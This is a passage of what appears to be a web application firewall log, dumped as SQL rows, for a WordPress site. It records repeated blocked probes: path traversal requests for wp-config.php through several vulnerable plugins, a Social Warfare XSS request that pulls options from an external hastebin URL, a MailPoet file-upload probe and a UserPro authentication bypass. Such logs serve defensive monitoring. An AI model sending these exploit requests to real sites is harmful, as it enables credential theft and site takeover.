- Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(74,1627741124.587869,1627741124.515000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(75,1627741123.887346,1627741123.800500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(76,1627743235.564560,1627743235.449300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(77,1627743241.410206,1627743241.333500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(78,1627743240.066549,1627743239.975100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(79,1627743246.919757,1627743246.800100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(80,1627743272.460715,1627743272.384500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(81,1627743271.805457,1627743271.717200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(82,1627777783.799451,1627777783.719000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(83,1627777790.656475,1627777790.580200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(84,1627777789.177654,1627777789.099200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(85,1627777796.344073,1627777796.262700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(86,1627777822.155532,1627777822.070200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(87,1627777821.406610,1627777821.314400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(88,1627790104.246064,1627790104.104100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(89,1627790110.953283,1627790110.864400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(90,1627790109.587233,1627790109.507700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(91,1627790116.640987,1627790116.552000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(92,1627790142.672558,1627790142.586400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(93,1627790141.946989,1627790141.872400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(94,1627802846.271834,1627802846.154100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(95,1627802852.248869,1627802852.172100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(96,1627802850.872349,1627802850.798000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(97,1627802857.836826,1627802857.712700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(98,1627802882.404346,1627802882.328900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(99,1627802881.760633,1627802881.677300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(100,1627802940.599064,1627802940.506800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(101,1627802946.534862,1627802946.457400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(102,1627802945.149880,1627802945.075800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(103,1627802952.070644,1627802951.994900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(104,1627802980.047717,1627802979.970000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(105,1627802979.335765,1627802979.246300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(106,1627806056.991014,1627806056.912400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(107,1627806062.871233,1627806062.794300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(108,1627806061.504440,1627806061.406900,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(109,1627806068.763182,1627806068.685700,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(110,1627806093.563903,1627806093.420600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(111,1627806092.769661,1627806092.695600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 